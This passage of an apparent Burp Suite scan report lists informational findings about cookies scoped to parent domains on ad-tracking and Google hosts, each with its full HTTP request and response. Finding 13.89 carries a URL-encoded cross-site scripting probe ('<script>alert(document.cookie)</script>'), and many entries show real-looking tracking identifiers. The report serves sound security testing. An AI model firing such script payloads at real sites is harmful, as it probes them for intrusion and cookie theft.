P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<!-- aol -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.
...[SNIP]...

13.88. http://dp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?v=102&d=1&nwk=1&y=2&u=http%3A%2F%2Fwww.autobytel.com%2Fx22&r=http%3A%2F%2Fburp%2Fshow%2F31&rnd=989810 HTTP/1.1
Host: dp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=780z^4^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=780z^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0


13.89. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.abbreviations.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.abbreviations.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F32&po6wxt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 350
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 21:08:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 21:08:42 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 21:08:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:42 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscri
...[SNIP]...

13.90. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • S=feedburner-control-panel=WUwm58oBrG3PsoODTDjQ7A; Domain=.google.com; Path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 15:11:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=WUwm58oBrG3PsoODTDjQ7A; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Mon, 24 Jan 2011 15:11:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...

13.91. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:59 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

13.92. http://groups.google.com/group/joomla-commits/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-commits/topics

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

13.93. http://groups.google.com/groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

13.94. http://groups.google.com/grphp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:36:01 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

13.95. http://hairmakeup.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hairmakeup.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:01:46 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0050179958343506
X-Served-In: 0.084240913391113
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.96. http://howto.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://howto.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:04:18 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0045561790466309
X-Served-In: 0.051589965820312
X-Served-By: h04
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.97. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • uuid2=1970530412525028204; path=/; expires=Sun, 24-Apr-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 25-Jan-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=1970530412525028204; path=/; expires=Sun, 24-Apr-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly
Location: ...B
Date: Mon, 24 Jan 2011 22:36:29 GMT
Content-Length: 0
Connection: close


13.98. http://ib.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
  • uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
  • uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
  • anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=364&user=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 26-Jan-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 25 Jan 2011 01:35:49 GMT

GIF89a.............!.......,........@..L..;

13.99. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
  • uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
  • anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PA7vgjYL7Y-oMOJ=p+lV]xJ%3sbz?+-ptW1B'#)hgVCgQw>7'NF7uNVjSVPN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(EQzz#'-BocTIpdXA^TyXBajZK%mtyOeCVqSq?#P0kc+J(5SDVB>Zk=; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=65890&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 26-Jan-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PA7vgjYL7Y-oMOJ=p+lV]xJ%3sbz?+-ptW1B'#)hgVCgQw>7'NF7uNVjSVPN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(EQzz#'-BocTIpdXA^TyXBajZK%mtyOeCVqSq?#P0kc+J(5SDVB>Zk=; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Location: http://redcated/ADO/view/278612728/direct;wi.1;hi.1/01
Date: Tue, 25 Jan 2011 01:35:47 GMT
Content-Length: 0


13.100. http://id.google.com/verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SNID=43=yThlFMrnGBFw9FkRw3x0I7VYQdh_YKYEC0XnuKxC8A=O5FCzgMvUYm0AvQP; expires=Tue, 26-Jul-2011 22:19:42 GMT; path=/verify; domain=.google.com; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=ImC9hZaqf6E15jeFXzHEta1bUFSlTGsgCRWHYp2n3g=uRYxxjtBwki2Qqjt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=yThlFMrnGBFw9FkRw3x0I7VYQdh_YKYEC0XnuKxC8A=O5FCzgMvUYm0AvQP; expires=Tue, 26-Jul-2011 22:19:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 24 Jan 2011 22:19:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.101. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • rdrlst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • sglst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=4845 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
